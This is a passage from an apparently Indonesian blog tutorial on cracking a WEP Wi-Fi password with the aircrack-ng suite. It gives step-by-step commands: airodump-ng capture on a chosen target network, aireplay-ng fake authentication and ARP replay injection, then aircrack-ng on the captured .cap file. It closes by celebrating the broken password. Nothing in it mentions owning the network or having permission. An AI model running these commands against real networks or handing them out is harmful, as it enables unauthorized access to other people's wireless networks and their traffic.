Klo sudah ditentukan sasarannya ,klik Cltr+C untuk menghentikannya.

Bold BSSID nya lalu klik kanan copy.

Ketik

airodump-ng -c (channel) -w (file name) –bssid (BSSID) (device)


karena saya memilih linksyskk,maka filenamenya adalah linksyskk

Setelah mengetikkan coman diatas maka konsolnya akan berganti seperti ini

Biarkan dia mengumpulkan datanya.jangan diutak-atik.sementara itu kita buka konsol baru lagi lalu ktik:

aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 -e (ESSID) (device)


Jika command ini sukses,maka akan muncul kalimat “Association successful” dengan wajah tersenyumnya…seperti gambar diatas

Langkah selanjutnya adalah ketik (masih dalam konsol 2)

aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 (device)

perhatikan,setelah beberapa menit.maka font yg akan muncul dalam layar adalah sepertin ini:

Biarkan saja mereka melakukan kegiatan baca tulis,kita liat aja nanti….

Sekarang perhatikan baik baik gambar diatas..!!,dalam kolom DATA tertulis 3352 .nah yg kita butuh kan adalah diatas 15000 data.maka yg harus kita lakukan sekarang adalah,,,MENUNGGU..!!! ;-(

…………. ;-(

………….;-(

Yap..!!!liat..

Karna asyik menunggu..(he he he nunggu kok asyikk..!!) data yg terkumpul jadi kebanyakan..tapi ga papa lebih banyak lebih baek,klo perlu lebih dari ini ..uufff..!!

Ok Baby,,,n0w..it’s time for mbuka/crack/njebol passwordnye..maka

Buka konsol baru lagi ( yg lama jangan di tutup,biarin aja..)

Ketik command :

aircrack-ng -b (BSSID) (file name-01.cap)

sekedar info aja,file name nya dapat diliat dgn cara membuka Home

dobel klik ,dan lihat file name nya ada di situ

Gambar diatas menunjukkan bahwa file name nya adalah linksyskk-01.cap

Maka comandnya adalah:

aircrack-ng -b (BSSID) linksyskk-01.cap


He he he …Liat yg kotak merah…..ya…kamu sukses menjebol passwordnya…;-)